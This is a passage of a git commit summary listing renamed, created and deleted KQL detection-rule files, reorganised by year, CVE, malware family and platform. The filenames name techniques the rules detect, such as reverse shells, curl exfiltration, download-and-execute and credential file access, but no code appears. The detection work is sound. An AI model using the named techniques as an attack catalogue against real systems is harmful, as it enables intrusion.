2024/Exploits/CVE-2024-1708}/cve_2024_1708_screenconnect_path_traversal_exploitation.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2024/Exploits/CVE-2024-1709}/screenconnect_user_database_modification.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2024/Exploits/CVE-2024-3094}/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2024/Exploits/CVE-2024-3400}/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2024/Exploits/CVE-2024-35250}/potential_cve_2024_35250_exploitation_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2024/Exploits/CVE-2024-37085}/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2024/Exploits/CVE-2024-50623}/cve_2024_50623_exploitation_attempt_cleo.kql (100%) rename KQL/rules-emerging-threats/{Command and Control => 2024/Malware/CSharp-Streamer}/potential_csharp_streamer_rat_loading_net_executable_image.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2024/Malware/DarkGate}/darkgate_drop_darkgate_loader_in_c_temp_directory.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2024/Malware/Generic}/file_creation_related_to_rat_clients.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2024/Malware/KamiKakaBot}/potential_kamikakabot_activity_lure_document_execution.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2024/Malware/KamiKakaBot}/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2024/Malware/KamiKakaBot}/potential_kamikakabot_activity_winlogon_shell_persistence.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2024/Malware/Lummac-Stealer}/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2024/Malware/Raspberry-Robin}/potential_raspberry_robin_cpl_execution_activity.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2024/Malware/Raspberry-Robin}/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2024/Malware/kapeka}/kapeka_backdoor_autorun_persistence.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2024/Malware/kapeka}/kapeka_backdoor_configuration_persistence.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2024/Malware/kapeka}/kapeka_backdoor_execution_via_rundll32_exe.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2024/Malware/kapeka}/kapeka_backdoor_loaded_via_rundll32_exe.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2024/Malware/kapeka}/kapeka_backdoor_persistence_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2024/Malware/kapeka}/potential_kapeka_decrypted_backdoor_indicator.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2024/TA/FIN7}/potential_apt_fin7_exploitation_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2024/TA/Forest-Blizzard}/forest_blizzard_apt_custom_protocol_handler_creation.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2024/TA/Forest-Blizzard}/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2024/TA/Forest-Blizzard}/forest_blizzard_apt_file_creation_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2024/TA/Forest-Blizzard}/forest_blizzard_apt_javascript_constrained_file_creation.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2024/TA/Forest-Blizzard}/forest_blizzard_apt_process_creation_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2024/TA/SlashAndGrab-Exploitation-In-Wild}/screenconnect_slashandgrab_exploitation_indicators.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2025/Exploits/CVE-2025-10035}/potential_exploitation_of_goanywhere_mft_vulnerability.kql (100%) rename KQL/rules-emerging-threats/{Credential Access => 2025/Exploits/CVE-2025-24054}/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2025/Exploits/CVE-2025-30406}/suspicious_process_spawned_by_centrestack_portal_apppool.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2025/Exploits/CVE-2025-31161}/suspicious_crushftp_child_process.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2025/Exploits/CVE-2025-31324}/potential_sap_netweaver_webshell_creation.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2025/Exploits/CVE-2025-31324}/potential_sap_netweaver_webshell_creation_linux.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2025/Exploits/CVE-2025-32463}/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql (100%) rename KQL/rules-emerging-threats/{Command and Control => 2025/Exploits/CVE-2025-33053}/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2025/Exploits/CVE-2025-49144}/potential_notepad_cve_2025_49144_exploitation.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2025/Exploits/CVE-2025-53770}/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2025/Exploits/CVE-2025-53770}/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2025/Exploits/CVE-2025-54309}/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2025/Exploits/CVE-2025-57788}/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2025/Exploits/CVE-2025-57790}/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2025/Exploits/CVE-2025-57791}/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2025/Exploits/CVE-2025-59287}/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql (100%) create mode 100644 KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_filegrabber_activity.kql create mode 100644 KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_persistence_indicators.kql create mode 100644 KQL/rules-emerging-threats/2025/Malware/Grixba/grixba_malware_reconnaissance_activity.kql rename KQL/rules-emerging-threats/{Execution => 2025/Malware/Katz-Stealer}/katz_stealer_dll_loaded.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2025/Malware/Shai-Hulud}/shai_hulud_malicious_github_workflow_creation.kql (100%) rename KQL/rules-emerging-threats/{Exfiltration => 2025/Malware/Shai-Hulud}/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql (100%) rename KQL/rules-emerging-threats/{Impact => 2025/Malware}/funklocker_ransomware_file_creation.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2025/Malware}/kalambur_backdoor_curl_tor_socks_proxy_execution.kql (100%) delete mode 100644 KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql create mode 100644 KQL/rules-threat-hunting/linux/file/file_event/potentially_suspicious_long_filename_pattern_linux.kql rename KQL/rules-threat-hunting/{Execution => linux/file/file_event}/python_path_configuration_file_creation_linux.kql (100%) rename KQL/rules-threat-hunting/{Discovery => linux/process_creation}/process_discovery.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => linux/process_creation}/terminate_linux_process_via_kill.kql (100%) rename KQL/rules-threat-hunting/{Execution => macos/file/file_event}/python_path_configuration_file_creation_macos.kql (100%) rename KQL/rules-threat-hunting/{Collection => macos/process_creation}/clipboard_data_collection_via_pbpaste.kql (100%) rename KQL/rules-threat-hunting/{Credential Access => windows/file/file_access}/access_to_browser_credential_files_by_uncommon_applications.kql (100%) rename KQL/rules-threat-hunting/{Credential Access => windows/file/file_access}/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/file/file_access}/access_to_reg_hive_files_by_uncommon_applications.kql (100%) rename KQL/rules-threat-hunting/{Credential Access => windows/file/file_access}/access_to_sysvol_policies_share_by_uncommon_process.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/file/file_access}/access_to_windows_outlook_mail_files_by_uncommon_applications.kql (100%) rename KQL/rules-threat-hunting/{Credential Access => windows/file/file_access}/unattend_xml_file_access_attempt.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/file/file_delete}/ads_zone_identifier_deleted.kql (100%) rename KQL/rules-threat-hunting/{Resource Development => windows/file/file_event}/creation_of_an_executable_by_an_executable.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/file/file_event}/dmp_hdmp_file_creation.kql (100%) rename KQL/rules-threat-hunting/{Credential Access => windows/file/file_event}/pfx_file_creation.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/file/file_event}/python_path_configuration_file_creation_windows.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/file/file_event}/scheduled_task_created_filecreation.kql (100%) rename KQL/rules-threat-hunting/{Command and Control => windows/file/file_event}/vscode_code_tunnel_execution_file_indicator.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/file/file_event}/wdac_policy_file_creation_in_codeintegrity_folder.kql (100%) rename KQL/rules-threat-hunting/{Initial Access => windows/file/file_event}/webdav_temporary_local_file_creation.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/image_load}/amsi_dll_load_by_uncommon_process.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/image_load}/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql (100%) rename KQL/rules-threat-hunting/{Credential Access => windows/image_load}/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/image_load}/microsoft_excel_add_in_loaded.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/image_load}/microsoft_word_add_in_loaded.kql (100%) rename KQL/rules-threat-hunting/{Collection => windows/image_load}/system_drawing_dll_load.kql (100%) rename KQL/rules-threat-hunting/{Persistence => windows/image_load}/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/image_load}/wmi_module_loaded_by_uncommon_process.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/network_connection}/dfsvc_exe_network_connection_to_non_local_ips.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/network_connection}/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/network_connection}/hh_exe_initiated_http_network_connection.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/network_connection}/msiexec_exe_initiated_network_connection_over_http.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/network_connection}/network_connection_initiated_by_powershell_process.kql (100%) rename KQL/rules-threat-hunting/{Command and Control => windows/network_connection}/network_connection_initiated_from_users_public_folder.kql (100%) rename KQL/rules-threat-hunting/{Command and Control => windows/network_connection}/potentially_suspicious_azure_front_door_connection.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/arbitrary_command_execution_using_wsl.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/cab_file_extraction_via_wusa_exe.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/clickonce_deployment_execution_dfsvc_exe_child_process.kql (100%) rename KQL/rules-threat-hunting/{Discovery => windows/process_creation}/cmd_shell_output_redirect.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/codepage_modification_via_mode_com.kql (100%) rename KQL/rules-threat-hunting/{Command and Control => windows/process_creation}/curl_exe_execution.kql (100%) rename KQL/rules-threat-hunting/{Command and Control => windows/process_creation}/curl_exe_execution_with_custom_useragent.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/diskshadow_child_process_spawned.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/diskshadow_script_mode_execution.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/dll_call_by_ordinal_via_rundll32_exe.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/dynamic_net_compilation_via_csc_exe_hunting.kql (100%) rename KQL/rules-threat-hunting/{Privilege Escalation => windows/process_creation}/elevated_system_shell_spawned.kql (100%) rename KQL/rules-threat-hunting/{Credential Access => windows/process_creation}/eventlog_query_requests_by_builtin_utilities.kql (100%) rename KQL/rules-threat-hunting/{Persistence => windows/process_creation}/execution_from_webserver_root_folder.kql (100%) rename KQL/rules-threat-hunting/{Command and Control => windows/process_creation}/file_download_via_curl_exe.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/file_or_folder_permissions_modifications.kql (100%) rename KQL/rules-threat-hunting/{Exfiltration => windows/process_creation}/ftp_connection_open_attempt_via_winscp_cli.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/headless_process_launched_via_conhost_exe.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/import_new_module_via_powershell_commandline.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/manual_execution_of_script_inside_of_a_compressed_file.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/microsoft_workflow_compiler_execution.kql (100%) rename KQL/rules-threat-hunting/{Discovery => windows/process_creation}/net_exe_execution.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/new_self_extracting_package_created_via_iexpress_exe.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql (100%) rename KQL/rules-threat-hunting/{Collection => windows/process_creation}/password_protected_compressed_file_extraction_via_7zip.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/potential_boinc_software_execution_uc_berkeley_signature_.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/potential_commandline_obfuscation_using_unicode_characters.kql (100%) rename KQL/rules-threat-hunting/{Exfiltration => windows/process_creation}/potential_data_exfiltration_via_curl_exe.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/potential_dll_sideloading_activity_via_extexport_exe.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/potential_file_override_append_via_set_command.kql (100%) rename KQL/rules-threat-hunting/{Credential Access => windows/process_creation}/potential_password_reconnaissance_via_findstr_exe.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/potential_proxy_execution_via_explorer_exe_from_shell_process.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/potential_suspicious_execution_from_guid_like_folder_names.kql (100%) rename KQL/rules-threat-hunting/{Collection => windows/process_creation}/potentially_suspicious_compression_tool_parameters.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/potentially_suspicious_powershell_child_processes.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/process_execution_from_webdav_share.kql (100%) rename KQL/rules-threat-hunting/{Impact => windows/process_creation}/process_terminated_via_taskkill.kql (100%) rename KQL/rules-threat-hunting/{Command and Control => windows/process_creation}/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/remote_access_tool_ammy_admin_agent_execution.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/remote_access_tool_cmd_exe_execution_via_anyviewer.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/remote_access_tool_screenconnect_remote_command_execution_hunting.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql (100%) rename KQL/rules-threat-hunting/{Discovery => windows/process_creation}/sc_exe_query_execution.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/scheduled_task_creation_from_potential_suspicious_parent_location.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/set_files_as_system_files_using_attrib_exe.kql (100%) rename KQL/rules-threat-hunting/{Lateral Movement => windows/process_creation}/smb_over_quic_via_net_exe.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/suspicious_new_instance_of_an_office_com_object.kql (100%) rename KQL/rules-threat-hunting/{Discovery => windows/process_creation}/suspicious_tasklist_discovery_command.kql (100%) rename KQL/rules-threat-hunting/{Discovery => windows/process_creation}/system_information_discovery_via_wmic_exe.kql (100%) rename KQL/rules-threat-hunting/{Exfiltration => windows/process_creation}/tunneling_tool_execution.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/unusually_long_powershell_commandline.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/use_short_name_path_in_command_line.kql (100%) rename KQL/rules-threat-hunting/{Exfiltration => windows/process_creation}/winscp_execution_from_non_standard_folder.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/registry/registry_event}/scheduled_task_created_registry.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/registry/registry_set}/command_executed_via_run_dialog_box_registry.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/registry/registry_set}/microsoft_office_trusted_location_updated.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/registry/registry_set}/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/registry/registry_set}/service_binary_in_user_controlled_folder.kql (100%) rename KQL/rules-threat-hunting/{Persistence => windows/registry/registry_set}/shell_context_menu_command_tampering.kql (100%) delete mode 100644 KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql delete mode 100644 KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql delete mode 100644 KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql delete mode 100644 KQL/rules/Discovery/pua_adfind_suspicious_execution.kql delete mode 100644 KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql delete mode 100644 KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql delete mode 100644 KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql delete mode 100644 KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql delete mode 100644 KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql rename KQL/rules/{Defense Evasion => linux/file_event}/linux_doas_conf_file_creation.kql (100%) rename KQL/rules/{Privilege Escalation => linux/file_event}/persistence_via_cron_files.kql (100%) rename KQL/rules/{Privilege Escalation => linux/file_event}/persistence_via_sudoers_files.kql (100%) rename KQL/rules/{Persistence => linux/file_event}/potentially_suspicious_shell_script_creation_in_profile_folder.kql (100%) create mode 100644 KQL/rules/linux/file_event/suspicious_filename_with_embedded_base64_commands.kql rename KQL/rules/{Defense Evasion => linux/file_event}/triple_cross_ebpf_rootkit_default_lockfile.kql (100%) rename KQL/rules/{Privilege Escalation => linux/file_event}/triple_cross_ebpf_rootkit_default_persistence.kql (100%) rename KQL/rules/{Command and Control => linux/file_event}/wget_creating_files_in_tmp_directory.kql (100%) rename KQL/rules/{Command and Control => linux/network_connection}/communication_to_localtonet_tunneling_service_initiated_linux.kql (100%) rename KQL/rules/{Exfiltration => linux/network_connection}/communication_to_ngrok_tunneling_service_linux.kql (100%) rename KQL/rules/{Impact => linux/network_connection}/linux_crypto_mining_pool_connections.kql (100%) rename KQL/rules/{Execution => linux/network_connection}/linux_reverse_shell_indicator.kql (100%) rename KQL/rules/{Persistence => linux/network_connection}/potentially_suspicious_malware_callback_communication_linux.kql (100%) rename KQL/rules/{Reconnaissance => linux/process_creation}/access_of_sudoers_file_content.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/audit_rules_deleted_via_auditctl.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/bash_interactive_shell.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/bpftrace_unsafe_option_usage.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/capabilities_discovery_linux.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/capsh_shell_invocation_linux.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/chmod_suspicious_directory.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/clear_linux_logs.kql (100%) rename KQL/rules/{Collection => linux/process_creation}/clipboard_collection_with_xclip_tool.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/connection_proxy.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/container_residence_discovery_via_proc_virtual_fs.kql (100%) rename KQL/rules/{Credential Access => linux/process_creation}/copy_passwd_or_shadow_from_tmp_path.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/crontab_enumeration.kql (100%) rename KQL/rules/{Command and Control => linux/process_creation}/curl_usage_on_linux.kql (100%) rename KQL/rules/{Impact => linux/process_creation}/dd_file_overwrite.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/decode_base64_encoded_text.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/disable_or_stop_services.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/disabling_security_tools.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/docker_container_discovery_via_dockerenv_listing.kql (100%) rename KQL/rules/{Command and Control => linux/process_creation}/download_file_to_potentially_suspicious_directory_via_wget.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/enable_bpf_kprobes_tracing.kql (100%) rename KQL/rules/{Persistence => linux/process_creation}/esxi_account_creation_via_esxcli.kql (100%) rename KQL/rules/{Persistence => linux/process_creation}/esxi_admin_permission_assigned_to_account_via_esxcli.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/esxi_network_configuration_discovery_via_esxcli.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/esxi_storage_information_discovery_via_esxcli.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/esxi_syslog_configuration_change_via_esxcli.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/esxi_system_information_discovery_via_esxcli.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/esxi_vm_kill_via_esxcli.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/esxi_vm_list_discovery_via_esxcli.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/esxi_vsan_information_discovery_via_esxcli.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/execution_of_script_located_in_potentially_suspicious_directory.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/file_and_directory_discovery_linux.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/file_deletion.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/flush_iptables_ufw_chain.kql (100%) rename KQL/rules/{Impact => linux/process_creation}/group_has_been_deleted_via_groupdel.kql (100%) rename KQL/rules/{Impact => linux/process_creation}/history_file_deletion.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/inline_python_execution_spawn_shell_via_os_system_library.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/install_root_certificate.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/interactive_bash_suspicious_children.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/kaspersky_endpoint_security_stopped_via_commandline_linux.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/linux_base64_encoded_pipe_to_shell.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/linux_base64_encoded_shebang_in_cli.kql (100%) rename KQL/rules/{Impact => linux/process_creation}/linux_crypto_mining_indicators.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/linux_doas_tool_execution.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/linux_hacktool_execution.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/linux_network_service_scanning_tools_execution.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/linux_package_uninstall.kql (100%) rename KQL/rules/{Reconnaissance => linux/process_creation}/linux_recon_indicators.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/linux_remote_system_discovery.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/linux_shell_pipe_to_shell.kql (100%) rename KQL/rules/{Privilege Escalation => linux/process_creation}/linux_sudo_chroot_execution.kql (100%) rename KQL/rules/{Persistence => linux/process_creation}/linux_webshell_indicators.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/local_groups_discovery_linux.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/local_system_accounts_discovery_linux.kql (100%) rename KQL/rules/{Persistence => linux/process_creation}/mask_system_power_settings_via_systemctl.kql (100%) rename KQL/rules/{Credential Access => linux/process_creation}/mount_execution_with_hidepid_parameter.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/named_pipe_created_via_mkfifo.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/nohup_execution.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/os_architecture_discovery_via_grep.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/pnscan_binary_data_transmission_activity.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/potential_container_discovery_via_inodes_listing.kql (68%) rename KQL/rules/{Discovery => linux/process_creation}/potential_discovery_activity_using_find_linux.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/potential_gobrat_file_discovery_via_grep.kql (100%) rename KQL/rules/{Command and Control => linux/process_creation}/potential_linux_amazon_ssm_agent_hijacking.kql (100%) rename KQL/rules/{Privilege Escalation => linux/process_creation}/potential_linux_process_code_injection_via_dd_utility.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/potential_netcat_reverse_shell_execution.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/potential_perl_reverse_shell_execution.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/potential_php_reverse_shell.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/potential_ruby_reverse_shell.kql (100%) rename KQL/rules/{Impact => linux/process_creation}/potential_suspicious_change_to_sensitive_critical_files.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/potential_xterm_reverse_shell.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/potentially_suspicious_execution_from_tmp_folder.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/potentially_suspicious_named_pipe_created_via_mkfifo.kql (100%) rename KQL/rules/{Reconnaissance => linux/process_creation}/print_history_file_contents.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/pua_trufflehog_execution_linux.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/python_reverse_shell_execution_via_pty_and_socket_modules.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/python_spawning_pretty_tty_via_pty_module.kql (100%) rename KQL/rules/{Exfiltration => linux/process_creation}/python_webserver_execution_linux.kql (100%) rename KQL/rules/{Persistence => linux/process_creation}/remote_access_tool_team_viewer_session_started_on_linux_host.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/remove_immutable_file_attribute.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/remove_scheduled_cron_task_job.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/scheduled_cron_task_job_linux.kql (100%) rename KQL/rules/{Privilege Escalation => linux/process_creation}/scheduled_task_job_at.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/security_software_discovery_linux.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/setuid_and_setgid.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/shell_execution_gcc_linux.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/shell_execution_of_process_located_in_tmp_directory.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/shell_execution_via_find_linux.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/shell_execution_via_flock_linux.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/shell_execution_via_git_linux.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/shell_execution_via_nice_linux.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/shell_execution_via_rsync_linux.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/shell_invocation_via_apt_linux.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/shell_invocation_via_env_command_linux.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/shell_invocation_via_ssh_linux.kql (100%) rename KQL/rules/{Command and Control => linux/process_creation}/suspicious_curl_change_user_agents_linux.kql (100%) rename KQL/rules/{Exfiltration => linux/process_creation}/suspicious_curl_file_upload_linux.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/suspicious_download_and_execute_pattern_via_curl_wget.kql (100%) rename KQL/rules/{Reconnaissance => linux/process_creation}/suspicious_git_clone_linux.kql (100%) rename KQL/rules/{Execution => 